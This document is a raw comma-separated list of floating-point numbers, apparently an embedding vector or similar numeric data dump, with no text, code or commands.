-0.020427698269486427, 0.03479411080479622, 0.016726816073060036, 0.001109171542339027, 0.043478067964315414, 0.011853018775582314, -0.025949878618121147, 0.03155948221683502, 0.0011146354954689741, 0.030510414391756058, -0.005959292873740196, -0.018096433952450752, 0.008640246465802193, 0.044002603739500046, 0.036192867904901505, -0.019524333998560905, 0.0023640471044927835, -0.014009437523782253, 0.03968976438045502, -0.024463698267936707, 0.019626326858997345, 0.008479971438646317, 0.02685324288904667, 0.021141648292541504, 0.0432158000767231, -0.01739705540239811, 0.01534262951463461, -0.0030470346100628376, -0.0317634679377079, -0.017236780375242233, -0.00003397862383280881, -0.013900159858167171, 0.005995718762278557, -0.0020580687560141087, -0.049451932311058044, -0.011634462513029575, -0.051695771515369415, -0.02823743224143982, -0.0246531143784523, -0.03155948221683502, 0.04560534656047821, -0.03668826073408127, -0.03558091074228287, 0.017659323289990425, -0.049626775085926056, -0.010417834855616093, -0.02951962687075138, 0.012916658073663712, -0.022423842921853065, -0.02054426074028015, 0.04505167156457901, -0.0008400744991376996, 0.011474188417196274, 0.011889444664120674, -0.012967654503881931, 0.0009315948118455708, -0.013339199125766754, 0.015721458941698074, 0.009696600027382374, -0.012443119660019875, 0.025046514347195625, 0.020048867911100388, 0.004575104918330908, 0.01448297593742609, 0.030714398249983788, -0.009966152720153332, -0.03135549649596214, 0.0036644551437348127, -0.018183857202529907, -0.019393200054764748, 0.020937662571668625, -0.0011428656289353967, -0.00015663178055547178, 0.01368888933211565, 0.023808030411601067, 0.0019214712083339691, -0.018620967864990234, -0.0045969607308506966, -0.07273542881011963, -0.0047608776949346066, -0.016449978575110435, -0.016318846493959427, 0.0017038258956745267, -0.00000718559658707818, 0.0009862338192760944, -0.04117594659328461, 0.008137566968798637, -0.008297841995954514, -0.01410414557904005, 0.044031742960214615, -0.012268275022506714, -0.006392762064933777, -0.0254836268723011, 0.0031016734428703785, 0.01325906254351139, -0.023137792944908142, 0.007671314757317305, 0.030364708974957466, 0.0421084500849247, 0.007554751355201006, -0.02957790717482567, 0.03762076795101166, -0.011605322360992432, 0.0033165868371725082, -0.04965591803193092, -0.028077157214283943, 0.023035800084471703, -0.04283697158098221, -0.02105422504246235, -0.0017083791317418218, -0.029082514345645905, 0.012100715190172195, -0.03153034299612045, -0.025527337566018105, -0.02919907681643963, -0.0024332564789801836, -0.007489184383302927, 0.013186209835112095, 0.016144001856446266, -0.005824516527354717, -0.01926206611096859, -0.008246845565736294, 0.017863307148218155, 0.026692969724535942, 0.010869516991078854, 0.02226356789469719, -0.013616036623716354, 0.03791217505931854, -0.01443197950720787, 0.0076567442156374454, 0.0031289930921047926, -0.004662527237087488, 0.018111005425453186, -0.006316267419606447, 0.001899615628644824, 0.0003829282650258392, 0.023137792944908142, 0.004957578144967556, -0.011117213405668736, -0.008662101812660694, 0.03546435013413429, -0.03068525902926922, 0.009718455374240875, -0.04353635013103485, 0.03208401799201965, 0.02337091788649559, 0.025177648290991783, 0.0026445272378623486, -0.0021218142937868834, 0.034123871475458145, -0.0028102656360715628, 0.006713310722261667, 0.017105646431446075, 0.010257559828460217, 0.03683396801352501, -0.030189864337444305, 0.022380132228136063, 0.006742451805621386, 0.03400731086730957, -0.0038356573786586523, 0.004462184384465218, 0.0001509402209194377, -0.016420839354395866, 0.0015107681974768639, 0.010060859844088554, 0.015109502710402012, 0.01936405897140503, -0.025396203622221947, 0.0009279522346332669, 0.012676246464252472, -0.005569534841924906, 0.03764990717172623, -0.02554190717637539, 0.008581964299082756, 0.023414630442857742, -0.012297416105866432, -0.003591603133827448, -0.015022080391645432, -0.028368564322590828, 0.02599358931183815, -0.02001972682774067, -0.013834592886269093, 0.014439264312386513, 0.022380132228136063, -0.005245343316346407, 0.0013477618340402842, 0.002249305136501789, 0.008851516991853714, 0.0013095145113766193, -0.006130495108664036, 0.006713310722261667, -0.025148507207632065, -0.009441617876291275, -0.009725741110742092, -0.011758311651647091, 0.005737094208598137, -0.015750600025057793, 0.0004566909046843648, 0.004174419213086367, -0.009172065183520317, 0.03759162873029709, 0.006323552690446377, -0.03572661429643631, -0.016595683991909027, 0.019116362556815147, 0.007157708052545786, 0.002362225903198123, -0.03913608938455582, 0.03968976438045502, 0.002522500231862068, 0.006148708052933216, 0.04470198228955269, -0.008006433956325054, 0.01850440539419651, -0.005970220547169447, 0.03473582863807678, 0.03161776438355446, -0.010527112521231174, 0.02485709823668003, 0.006939152255654335, -0.05784447863698006, 0.026037301868200302, -0.023283496499061584, 0.022773532196879387, 0.01303322147578001, 0.00028389508952386677, -0.01344847772270441, -0.003156312508508563, -0.03493981435894966, -0.018038153648376465, 0.040680550038814545, 0.019699178636074066, -0.03473582863807678, -0.018897807225584984, 0.017003655433654785, 0.04242900013923645, -0.01284380629658699, -0.004673455376178026, -0.01580888219177723, 0.004061498679220676, 0.004476754926145077, -0.028048016130924225, -0.003648063400760293, -0.027800319716334343, 0.0063454085029661655, 0.0035242149606347084, 0.016216853633522987, 0.02568761259317398, 0.01161989290267229, -0.05073412507772446, 0.0012448583729565144, -0.0021272781305015087, 0.01382730808109045, 0.011612607166171074, 0.005911938846111298, 0.05047185719013214, 0.05959292873740196, 0.0015089468797668815, -0.020587973296642303, -0.025629330426454544, -0.027115510776638985, -0.016595683991909027, 0.01577974110841751, 0.010512541979551315, -0.01470881700515747, -0.03907780721783638, -0.019670037552714348, 0.028849387541413307, 0.035988882184028625, -0.013535900041460991, -0.028878528624773026, 0.015867164358496666, 0.026532694697380066, -0.011904015205800533, -0.022977517917752266, 0.014905516989529133, 0.01722221076488495, -0.014002152718603611, -0.0030707113910466433, -0.00046944001223891973, -0.012071575038135052, 0.00023927325673867017, 0.005201632156968117, -0.027538051828742027, 0.005099639296531677, 0.008625675924122334, 0.0013368340441957116, -0.014096859842538834, -0.036746542900800705, 0.03633857145905495, -0.014490260742604733, 0.04575105011463165, 0.022292708978056908, 0.01905808039009571, -0.024143150076270103, 0.01213714201003313, 0.0017174857202917337, 0.012836520560085773, -0.014803524129092693, -0.026780391111969948, 0.01567774824798107, 0.007452758494764566, -0.0038283721078187227, 0.03829100728034973, 0.02495909109711647, -0.0076567442156374454, 0.01860639825463295, 0.02627042680978775, -0.011386766098439693, -0.02389545366168022, 0.001239394536241889, -0.04493510723114014, 0.022758962586522102, 0.02679496258497238, -0.02361861616373062, 0.010993365198373795, -0.012639820575714111, -0.013514043763279915, -0.007700455375015736, -0.019670037552714348, -0.04225415363907814, -0.015940016135573387, -0.030539553612470627, 0.0036881319247186184, -0.01439555361866951, -0.023283496499061584, 0.004276411607861519, 0.020078008994460106, 0.015721458941698074, -0.006968292873352766, -0.02775660902261734, 0.005605960730463266, 0.011182780377566814, -0.02160790003836155, 0.004494967870414257, 0.011612607166171074, -0.023589475080370903, 0.009383336640894413, 0.024245142936706543, 0.009864159859716892, -0.01312064379453659, 0.021287351846694946, -0.033774182200431824, -0.013521329499781132, -0.014133285731077194, 0.0031872745603322983, 0.014796239323914051, -0.03794131800532341, 0.022525835782289505, -0.0031745254527777433, 0.007172278594225645, -0.007525610737502575, -0.04036000370979309, -0.018081864342093468, 0.01462139468640089, 0.027290355414152145, 0.004436686169356108, -0.003651706036180258, -0.0008646620553918183, 0.0019269351614639163, 0.004531393758952618, -0.009339625015854836, 0.008960794657468796, -0.003934007603675127, -0.027261214330792427, 0.004010502249002457, -0.021651610732078552, 0.02178274467587471, -0.0073580509051680565, 0.011139069683849812, -0.008392549119889736, -0.03520208224654198, 0.001355046988464892, 0.03045213222503662, -0.02609558217227459, 0.010046289302408695, 0.020617112517356873, 0.020427698269486427, 0.026561835780739784, -0.032783396542072296, 0.020995942875742912, -0.04595503583550453, 0.0007817929144948721, -0.007270628586411476, -0.02316693216562271, 0.008494541980326176, -0.017732175067067146, 0.011029791086912155, 0.011496043764054775, 0.004196274559944868, -0.0033839750103652477, 0.03324965015053749, -0.002706451341509819, 0.010949654504656792, -0.03884468227624893, 0.010170137509703636, 0.010556253604590893, -0.01496379915624857, -0.012406693771481514, 0.015022080391645432, 0.01923292502760887, -0.01481080986559391, -0.008567393757402897, 0.013368340209126472, -0.01757190003991127, -0.004108852241188288, 0.020107150077819824, -0.034327857196331024, 0.008093856275081635, -0.005110566969960928, -0.01496379915624857, 0.030918383970856667, -0.010490686632692814, 0.014745242893695831, -0.009944296441972256, 0.004640671890228987, -0.01470881700515747, 0.01567774824798107, 0.017528189346194267, 0.010082715190947056, 0.0030688901897519827, -0.019946875050663948, -0.04231243580579758, 0.020704535767436028, -0.0018422447610646486, 0.018664680421352386, 0.014890946447849274, 0.007026574574410915, 0.017105646431446075, -0.01684338040649891, 0.008021004498004913, 0.0007048430270515382, 0.020879380404949188, -0.007576607167720795, 0.03324965015053749, -0.01905808039009571, 0.006738808937370777, -0.012100715190172195, 0.04749949648976326, -0.023079510778188705, -0.006407332606613636, -0.02168075181543827, -0.011007935740053654, -0.004786375910043716, -0.03386160358786583, -0.008647531270980835, 0.004870155360549688, -0.008341552689671516, -0.009310483932495117, 0.019305776804685593, 0.004494967870414257, -0.009026361629366875, 0.015124073252081871, -0.0021873810328543186, -0.011357625015079975, -0.01327363308519125, -0.02613929472863674, 0.018693821504712105, 0.003005144651979208, 0.031180651858448982, 0.01709107682108879, -0.016828808933496475, 0.014402838423848152, 0.019247496500611305, 0.008836946450173855, -0.0011401335941627622, -0.04435229301452637, 0.014140571467578411, -0.009113783948123455, -0.005001289304345846, -0.004600603133440018, 0.030219005420804024, 0.007048429921269417, -0.030889244750142097, -0.010701957158744335, -0.009142925031483173, 0.009135639294981956, 0.01950976252555847, 0.04368205368518829, -0.0066331736743450165, 0.03313308581709862, 0.0019178286893293262, 0.020966803655028343, 0.020180001854896545, -0.031880032271146774, -0.010046289302408695, -0.004287339746952057, -0.030248146504163742, -0.017790455371141434, -0.005660599563270807, 0.013506758958101273, -0.048869114369153976, -0.02458026073873043, 0.04135078936815262, 0.03773733228445053, -0.013674318790435791, -0.019553475081920624, -0.029111655429005623, -0.029709041118621826, -0.0016264206496998668, 0.011328484863042831, 0.007496469654142857, -0.004094281699508429, -0.012341126799583435, 0.002983289072290063, 0.04379861801862717, -0.0025316067039966583, -0.010323126800358295, 0.013856448233127594, 0.016391698271036148, -0.015473762527108192, -0.015284347347915173, -0.02965076081454754, -0.024944521486759186, 0.00039704336086288095, -0.023968305438756943, -0.007838874123990536, -0.005751664750277996, 0.036746542900800705, -0.01513864379376173, -0.01379088219255209, -0.01898522861301899, 0.036192867904901505, 0.01503665093332529, -0.03893210366368294, -0.01736791431903839, 0.010825805366039276, -0.0023512979969382286, 0.010366838425397873, 0.007325267419219017, -0.018096433952450752, -0.005248985718935728, -0.0015107681974768639, 0.009099213406443596, 0.010366838425397873, -0.044410575181245804, 0.005474827252328396, -0.020689966157078743, -0.036746542900800705, -0.01684338040649891, -0.004192632157355547, 0.011539755389094353, -0.004939364735037088, -0.020879380404949188, 0.01486180629581213, 0.013754455372691154, -0.006225202698260546, -0.006272556260228157, 0.005139708053320646, -0.0344444215297699, -0.024216001853346825, -0.010541683062911034, -0.008727668784558773, -0.013514043763279915, 0.03007330186665058, -0.020966803655028343, -0.007860729470849037, -0.015823451802134514, 0.006625888403505087, 0.0339781679213047, 0.03380332514643669, -0.021535048261284828, -0.03100580722093582, 0.03217143937945366, 0.021870167925953865, -0.028295712545514107, 0.019670037552714348, -0.009842303581535816, 0.00018873218505177647, -0.005256270989775658, -0.012494116090238094, -0.0008446277352049947, 0.046829260885715485, -0.003143563400954008, 0.024157719686627388, -0.008297841995954514, -0.02050055004656315, -0.01439555361866951, -0.013047791086137295, -0.0012057004496455193, -0.0038392997812479734, 0.055833764374256134, -0.016449978575110435, 0.0063053397461771965, -0.01787787862122059, 0.018344130367040634, 0.04545964300632477, -0.01482538040727377, -0.018752101808786392, 0.022569546476006508, -0.007449116092175245, 0.026212146505713463, -0.020107150077819824, 0.004779090639203787, -0.0063745491206645966, -0.016697676852345467, -0.01891237683594227, -0.012057004496455193, -0.03677568584680557, -0.01832956075668335, -0.008479971438646317, 0.024186860769987106, 0.007379906717687845, 0.005318195093423128, -0.005941079929471016, 0.011729170568287373, 0.003027000231668353, -0.033366210758686066, 0.012749098241329193, -0.02102508395910263, 0.0010499793570488691, 0.0009233989985659719, -0.016828808933496475, 0.01853354647755623, -0.007860729470849037, 0.001925113843753934, 0.012180852703750134, 0.03313308581709862, 0.05493040010333061, -0.04315751791000366, 0.0051178522408008575, 0.004451256711035967, -0.016493691131472588, 0.002132741967216134, 0.017134787514805794, -0.007999148219823837, -0.01463596522808075, 0.02157875895500183, 0.017236780375242233, 0.0005108745535835624, 0.020617112517356873, 0.0009734847117215395, 0.0076276035979390144, -0.0058791558258235455, 0.007117639295756817, 0.022656969726085663, -0.024565691128373146, -0.023137792944908142, 0.002003429690375924, 0.030772680416703224, 0.006669599562883377, -0.056562285870313644, -0.003944935277104378, -0.005179776344448328, 0.005496682599186897, 0.01462139468640089, -0.006706025917083025, 0.004505895543843508, -0.005613246001303196, 0.01774674467742443, -0.009842303581535816, 0.03808702155947685, -0.009244917891919613, 0.0012066110502928495, -0.005354621447622776, 0.007598462514579296, -0.0010727455373853445, 0.012923942878842354, -0.008261416107416153, -0.021097935736179352, 0.0018112825928255916, 0.01279280986636877, -0.05213288590312004, -0.020136289298534393, -0.014264419674873352, 0.015094932168722153, 0.008727668784558773, -0.0020799243357032537, 0.003695417195558548, 0.004932079929858446, -0.0034859676379710436, -0.014737958088517189, -0.026386991143226624, 0.012530541978776455, -0.030714398249983788, 0.005984791088849306, -0.0026791319251060486, 0.003037927905097604, -0.015167783945798874, -0.005063213407993317, -0.024157719686627388, -0.02340005896985531, 0.016653964295983315, -0.04172962158918381, 0.004753592424094677, 0.01698908396065235, -0.030015019699931145, 0.012508686631917953, -0.011904015205800533, -0.012115285731852055, -0.012778239324688911, 0.012508686631917953, -0.018242137506604195, -0.023706037551164627, 0.011729170568287373, 0.025148507207632065, 0.08992850035429001, -0.012443119660019875, 0.0028084442019462585, -0.027334066107869148, 0.0066732424311339855, 0.006502040196210146, 0.0033985453192144632, 0.007933582179248333, 0.009922441095113754, 0.009121068753302097, 0.008807805366814137, 0.004054213408380747, 0.0010208385065197945, 0.010818520560860634, 0.004385689739137888, 0.018650108948349953, 0.004600603133440018, -0.01180930808186531, 0.008705812506377697, -0.017324203625321388, 0.010782094672322273, -0.00026795873418450356, 0.01626056432723999, -0.017790455371141434, 0.017426196485757828, -0.01916007325053215, -0.007970008067786694, -0.0249299518764019, -0.02886395901441574, -0.014045863412320614, -0.005190704483538866, 0.0036462421994656324, -0.019757458940148354, -0.0018814026843756437, 0.01405314914882183, -0.009332340210676193, 0.019072651863098145, -0.0009889657376334071, -0.013419336639344692, -0.000699379132129252, 0.004800945986062288, -0.02599358931183815, -0.01489823218435049, 0.016377126798033714, -0.0043638343922793865, -0.02851426973938942, 0.008989935740828514, 0.0010162852704524994, -0.010432405397295952, -0.003648063400760293, 0.007139495108276606, -0.02755262330174446, 0.011335769668221474, 0.029359351843595505, 0.0031289930921047926, 0.01805272325873375, 0.0014533972134813666, -0.01636255718767643, -0.01430813129991293, -0.01722221076488495, 0.005401975009590387, 0.02309408038854599, -0.0025498196482658386, 0.027159221470355988, -0.015838023275136948, -0.007729595992714167, -0.02533792145550251, 0.016683105379343033, -0.019626326858997345, 0.001083673327229917, 0.01534262951463461, -0.003074354026466608, 0.01736791431903839, 0.0029851102735847235, -0.0019651823677122593, 0.010694672353565693, -0.0057443794794380665, 0.028601691126823425, -0.038436710834503174, -0.013229921460151672, 0.03202573582530022, 0.02596445009112358, -0.010643675923347473, 0.015284347347915173, -0.018387842923402786, 0.02747977152466774, 0.0018923304742202163, 0.007066642865538597, -0.0013668854953721166, 0.006527538411319256, -0.01722221076488495, -0.008669386617839336, -0.00035082787508144975, 0.0012721779057756066, 0.003686310723423958, 0.026707539334893227, 0.013164354488253593, -0.003121707821264863, -0.009325054474174976, -0.005897368770092726, -0.0062361303716897964, 0.008698527701199055, 0.03584317862987518, -0.006997433491051197, 0.0061705633997917175, 0.0012485010083764791, -0.014745242893695831, 0.020078008994460106, 0.009274058043956757, 0.004447613842785358, -0.04802403226494789, -0.022686108946800232, -0.004582390189170837, -0.0312097929418087, -0.0031034948769956827, -0.009805877692997456, 0.018795814365148544, 0.012625250034034252, -0.025847885757684708, -0.018009012565016747, -0.025702182203531265, -0.009886015206575394, 0.04580933228135109, -0.007773307152092457, 0.003708166303113103, 0.0034040091559290886, -0.003371225902810693, -0.015721458941698074, 0.03400731086730957, 0.03304566442966461, 0.018650108948349953, 0.0037846609484404325, 0.004790018312633038, -0.0016765064792707562, 0.03068525902926922, -0.020515119656920433, 0.03348277509212494, 0.012581538408994675, 0.005310910288244486, -0.005595033057034016, -0.010614534839987755, 0.028120867908000946, 0.0065676067024469376, -0.02064625360071659, 0.010774808935821056, 0.004360191524028778, 0.015940016135573387, 0.009230347350239754, 0.018067292869091034, 0.008982650004327297, -0.005635101348161697, -0.029709041118621826, 0.004039642866700888, 0.04298267513513565, -0.003861155593767762, 0.000042089097405551, 0.008924368768930435, -0.018518976867198944, -0.007824303582310677, -0.0032546627335250378, 0.004265483934432268, 0.003203666303306818, 0.021243641152977943, 0.0066040330566465855, -0.002067175228148699, 0.028281142935156822, -0.014992939308285713, -0.03083096258342266, -0.019407769665122032, -0.032637692987918854, -0.0005113299121148884, 0.011692744679749012, -0.014563112519681454, 0.025046514347195625, 0.007161350455135107, 0.0028922241181135178, 0.0009315948118455708, -0.004957578144967556, 0.045547064393758774, -0.02475510723888874, 0.00010859499889193103, 0.02157875895500183, 0.013623322360217571, -0.02274439111351967, 0.01563403755426407, -0.016581112518906593, -0.011102643795311451, 0.016042008996009827, -0.03773733228445053, 0.008698527701199055, 0.01618771255016327, 0.025352492928504944, -0.018489835783839226, 0.015663178637623787, -0.015969157218933105, -0.01850440539419651, -0.007223275024443865, -0.012974939309060574, -0.009856874123215675, 0.0015435515670105815, -0.008851516991853714, -0.018271278589963913, -0.017076507210731506, -0.013280917890369892, -0.004935722332447767, -0.004600603133440018, 0.0006233398453332484, 0.009922441095113754, -0.005431116092950106, 0.008210419677197933, -0.0290388036519289, 0.01684338040649891, 0.003988646436482668, 0.014978368766605854, -0.002560747554525733, 0.019014369696378708, -0.0003134912112727761, -0.02761090360581875, -0.007219632156193256, 0.002393187955021858, -0.017061935737729073, 0.023006659001111984, 0.011197350919246674, 0.008407119661569595, -0.022554976865649223, 0.020442267879843712, 0.026561835780739784, -0.01739705540239811, -0.004709881264716387, 0.012632534839212894, -0.01802358217537403, -0.002491538180038333, 0.014278990216553211, 0.005412902683019638, 0.0005099639529362321, -0.027013517916202545, 0.002923186169937253, 0.013798166997730732, 0.01870839111506939, -0.01577974110841751, 0.006199704483151436, 0.005693383049219847, -0.02679496258497238, -0.010024433955550194, -0.010971509851515293, -0.00019544822862371802, 0.0037445921916514635, 0.0017366092652082443, -0.0035988884046673775, 0.03214229643344879, -0.01444655004888773, -0.0075620366260409355, -0.008989935740828514, -0.006563964299857616, -0.006003004033118486, 0.03083096258342266, 0.016653964295983315, -0.005806303583085537, -0.0003114422725047916, 0.0016519188648089767, -0.006145065184682608, -0.010833091102540493, -0.002629956929013133, 0.0018240317003801465, -0.010228419676423073, 0.03686310723423958, -0.019699178636074066, -0.014089575037360191, -0.0006738809170201421, 0.004320123232901096, 0.004943007603287697, 0.006764307152479887, 0.007758737076073885, -0.01451940182596445, 0.01588173396885395, -0.009128354489803314, -0.0007012003916315734, -0.017163928598165512, 0.006079498678445816, 0.0009652888984419405, -0.009339625015854836, 0.04394432157278061, 0.007787877693772316, -0.02147676609456539, 0.012814665213227272, -0.02374974824488163, -0.032608550041913986, 0.007846158929169178, -0.03528950363397598, -0.013849163427948952, 0.0006374549120664597, 0.034327857196331024, -0.005828159395605326, -0.03339535370469093, 0.010140997357666492, 0.006013931706547737, -0.018285850062966347, 0.031326357275247574, -0.020704535767436028, 0.016755957156419754, 0.02150590717792511, 0.016551971435546875, 0.005970220547169447, 0.005478469654917717, -0.0038647979963570833, 0.0037919459864497185, -0.019116362556815147, 0.009966152720153332, 0.009077358059585094, -0.015736030414700508, 0.0014706995571032166, -0.010002578608691692, -0.018620967864990234, -0.03735850006341934, 0.009033646434545517, -0.003506002016365528, 0.007583891972899437, -0.008326982147991657, -0.015313488431274891, 0.005533108487725258, 0.007172278594225645, -0.015196925029158592, -0.016216853633522987, -0.023939164355397224, -0.020136289298534393, 0.005828159395605326, 0.012887516990303993, -0.009456188417971134, 0.005223487503826618, -0.0045969607308506966, 0.004545964300632477, 0.008538253605365753, 0.020456839352846146, -0.01373988576233387, -0.009019076824188232, -0.005401975009590387, -0.004447613842785358, 0.01988859288394451, -0.011022506281733513, 0.002895866520702839, -0.03275425359606743, 0.022248998284339905, -0.006458329036831856, 0.008654816076159477, 0.03590146079659462, 0.01379088219255209, 0.007787877693772316, 0.0017265921924263239, 0.0042946250177919865, -0.01888323575258255, -0.020981373265385628, -0.009907870553433895, 0.004618816077709198, 0.0033093015663325787, -0.005547679029405117, 0.006749737076461315, -0.004389332607388496, 0.02181188575923443, 0.005208917427808046, -0.021418485790491104, -0.029490485787391663, 0.012020578607916832, -0.006585820112377405, -0.012100715190172195, 0.009660174138844013, -0.003644420765340328, -0.0042836968787014484, 0.011860303580760956, -0.001562675228342414, -0.025250500068068504, -0.012384838424623013, 0.006192419212311506, 0.0010782094905152917, 0.013011365197598934, 0.015022080391645432, 0.016100289300084114, 0.031093228608369827, -0.026605546474456787, -0.03158862143754959, 0.0243762768805027, 0.00016186801076401025, -0.0022128792479634285, 0.0061414227820932865, 0.004753592424094677, -0.0334244929254055, 0.021112507209181786, -0.004509538412094116, 0.012268275022506714, 0.0019269351614639163, 0.0054566143080592155, 0.000293684599455446, 0.027523482218384743, 0.02168075181543827, 0.03980632871389389, 0.00006391623901436105, 0.0015253385063260794, 0.028499698266386986, -0.005205274559557438, -0.020981373265385628, -0.0042581986635923386, 0.01712021790444851, 0.009135639294981956, -0.007489184383302927, 0.018664680421352386, 0.00008554417581763119, 0.009259488433599472, -0.0058135888539254665, -0.032783396542072296, 0.03869897872209549, -0.014249849133193493, 0.009689314290881157, -0.01615857146680355, 0.02796059474349022, -0.010621820576488972, -0.003112601349130273, 0.0058427294716238976, -0.016493691131472588, -0.0002932292700279504, -0.03849499300122261, 0.009091928601264954, 0.012763668783009052, -0.005952007602900267, -0.016479119658470154, -0.041409071534872055, 0.017703033983707428, -0.011423191986978054, 0.010680101811885834, -0.010293986648321152, 0.004932079929858446, -0.002624492859467864, 0.005522180814296007, -0.003544249339029193, -0.0012985867215320468, -0.021666182205080986, 0.02906794473528862, 0.0065093254670500755, -0.02506108395755291, -0.01199872326105833, 0.009507184848189354, -0.007970008067786694, 0.0006898173014633358, -0.006064928136765957, -0.019014369696378708, 0.0064692567102611065, 0.009922441095113754, -0.015736030414700508, -0.008072000928223133, 0.0003396724059712142, 0.006782520096749067, -0.007026574574410915, 0.011838448233902454, -0.0008350659627467394, 0.006039429921656847, 0.022686108946800232, 0.0006943705375306308, 0.010723813436925411, 0.018183857202529907, 0.006746094208210707, 0.006895441096276045, -0.006494754925370216, 0.011831163428723812, -0.021870167925953865, 0.015561184845864773, 0.0018395127262920141, -0.002098137279972434, 0.01757190003991127, 0.004287339746952057, -0.009412476792931557, -0.0012293773470446467, -0.014002152718603611, 0.02347291074693203, 0.005871870554983616, -0.0033165868371725082, 0.00015936372801661491, 0.0010882265632972121, -0.013761741109192371, -0.007245130371302366, -0.02122906967997551, -0.000638820871245116, 0.010592679493129253, 0.003247377462685108, -0.009215776808559895, 0.0008774111629463732, 0.01618771255016327, -0.004021429922431707, 0.020325705409049988, 0.002750162733718753, 0.012035149149596691, 0.014249849133193493, 0.01684338040649891, 0.004684383049607277, 0.011233776807785034, -0.019028939306735992, 0.007419975008815527, 0.024157719686627388, 0.01916007325053215, 0.015823451802134514, 0.008407119661569595, 0.020485980436205864, -0.0012812843779101968, -0.0034695761278271675, -0.012639820575714111, 0.02119992859661579, -0.000586913840379566, 0.02122906967997551, -0.012858375906944275, -0.005795375909656286, -0.002719200449064374, 0.007423617877066135, -0.011139069683849812, -0.0036334930919110775, -0.0016309738857671618, -0.002491538180038333, 0.0033475488889962435, -0.01434455718845129, 0.010344983078539371, -0.01626056432723999, 0.010752953588962555, -0.02616843581199646, -0.0013104252284392715, 0.01605657860636711, 0.007226917427033186, -0.011131783947348595, -0.024813387542963028, 0.0013268168549984694, 0.018897807225584984, 0.013732600025832653, -0.007525610737502575, 0.003025178797543049, -0.0034422564785927534, -0.002491538180038333, 0.0019888593815267086, -0.009164780378341675, -0.0015899946447461843, 0.0069318669848144054, 0.003850227687507868, 0.01802358217537403, 0.0002738779585342854, 0.002460575895383954, -0.006687812507152557, 0.015196925029158592, 0.014978368766605854, -0.01792158931493759, 0.02571675181388855, 0.0035078234504908323, -0.009259488433599472, -0.00021673466835636646, -0.0036753828171640635, -0.027640044689178467, 0.011896730400621891, -0.0011146354954689741, -0.0011729170801118016, -0.0011802022345364094, -0.02564390003681183, 0.005496682599186897, 0.01561946701258421, 0.004290982149541378, 0.0008273253915831447, -0.010672817006707191, 0.018489835783839226, -0.004061498679220676, -0.003119886387139559, 0.007758737076073885, 0.020413126796483994, 0.003556998446583748, 0.01633341610431671, -0.006228845100849867, 0.00027615457656793296, -0.008654816076159477, -0.019874023273587227, -0.007347123231738806, 0.018795814365148544, -0.02157875895500183, 0.006687812507152557, -0.017805026844143867, 0.0048555852845311165, 0.003773733042180538, -0.017455337569117546, 0.013994866982102394, 0.0010436048032715917, 0.02644527330994606, 0.011445047333836555, -0.027596333995461464, -0.017513617873191833, -0.012909372337162495, -0.026255857199430466, 0.02022371254861355, -0.024944521486759186, -0.016377126798033714, -0.001865010941401124, 0.0032929100561887026, 0.018373271450400352, -0.019130932167172432, -0.006658671889454126, 0.00023210188373923302, -0.01646455004811287, -0.012027863413095474, 0.0002533883380237967, -0.008887942880392075, 0.01850440539419651, -0.0037955886218696833, 0.0038320147432386875, -0.002828478580340743, -0.010264845564961433, -0.007052072789520025, 0.000807291129603982, 0.013142499141395092, -0.009733025915920734, -0.014832665212452412, -0.028572550043463707, 0.00041935426997952163, -0.005667884834110737, -0.006953722331672907, -0.005303625017404556, -0.004367476794868708, -0.011554325930774212, 0.011037076823413372, -0.0017630181973800063, -0.0039012241177260876, -0.03980632871389389, 0.008006433956325054, 0.0037883035838603973, 0.002453290857374668, 0.020383987575769424, 0.013543184846639633, -0.0031107799150049686, 0.005299982149153948, -0.01615857146680355, 0.01161989290267229, 0.0020708178635686636, 0.0036680977791547775, 0.035231221467256546, 0.009813163429498672, 0.024667683988809586, -0.012355697341263294, 0.02720293402671814, -0.01312064379453659, 0.005405617877840996, -0.004061498679220676, -0.005066855810582638, 0.0023767962120473385, -0.026809532195329666, 0.0075620366260409355, 0.018373271450400352, -0.013229921460151672, 0.008370693773031235, 0.018970659002661705, -0.012180852703750134, -0.015765171498060226, 0.0029286500066518784, -0.012144426815211773, 0.01802358217537403, -0.01726592145860195, 0.022904666140675545, 0.004017787054181099, -0.0023804388474673033, 0.005667884834110737, 0.004771805368363857, 0.007299769204109907, 0.01551747415214777, 0.018766673281788826, 0.008356123231351376, -0.010082715190947056, 0.004797303583472967, 0.0042836968787014484, 0.014883661642670631, -0.017338773235678673, -0.003367583267390728, 0.01767389290034771, 0.012180852703750134, 0.0003540151519700885, 0.0030215363949537277, -0.0018741174135357141, 0.004822801798582077, -0.011656318791210651, -0.0006406421889550984, -0.010235704481601715, -0.004017787054181099, -0.008232275024056435, 0.005190704483538866, 0.004837372340261936, -0.011044361628592014, 0.013237206265330315, 0.0007795162964612246, 0.011561610735952854, -0.024769676849246025, -0.018970659002661705, -0.005562249571084976, -0.011401336640119553, -0.009142925031483173, 0.002302123000845313, 0.007540180813521147, 0.0071249245665967464, -0.01306964736431837, -0.005329123232513666, -0.038990385830402374, -0.0072342026978731155, 0.003475039964541793, 0.007033859845250845, 0.013106073252856731, 0.016275133937597275, -0.009077358059585094, -0.0032783395145088434, 0.013849163427948952, -0.0058427294716238976, 0.005299982149153948, 0.007241487968713045, -0.0021290993317961693, 0.007288841530680656, -0.008560108952224255, 0.024157719686627388, -0.006421903148293495, -0.002850334160029888, -0.004145278129726648, 0.012057004496455193, 0.010490686632692814, -0.0036152799148112535, -0.019101791083812714, 0.015532044693827629, -0.02274439111351967, -0.014249849133193493, 0.017032794654369354, -0.01628970541059971, -0.032258860766887665, 0.018868666142225266, 0.011102643795311451, -0.016930801793932915, -0.012355697341263294, -0.025804175063967705, 0.005722523666918278, 0.006851729471236467, 0.03584317862987518, 0.02896595187485218, 0.006119566969573498, -0.000022851620087749325, 0.0016783276805654168, -0.0031162439845502377, -0.014075004495680332, -0.007033859845250845, -0.004290982149541378, 0.037125375121831894, 0.004972148220986128, 0.006658671889454126, 0.006549393758177757, 0.005157920997589827, 0.002580781700089574, -0.005995718762278557, 0.0031235290225595236, -0.027319496497511864, 0.002028927905485034, -0.005292696878314018, 0.014184282161295414, -0.012880232185125351, 0.0014998404076322913, 0.0022729821503162384, -0.007977292872965336, 0.0012230027932673693, -0.001701093977317214, 0.0023512979969382286, -0.026314139366149902, 0.0019323989981785417, 0.01653740182518959, 0.013659748248755932, 0.015269776806235313, 0.006782520096749067, 0.002586245769634843, 0.007817018777132034, -0.028004305437207222, -0.01905808039009571, -0.019407769665122032, -0.012027863413095474, -0.008989935740828514, 0.022758962586522102, -0.008946224115788937, 0.006272556260228157, 0.00046807402395643294, 0.025119366124272346, -0.006083141081035137, 0.006261628586798906, -0.011445047333836555, 0.020252853631973267, 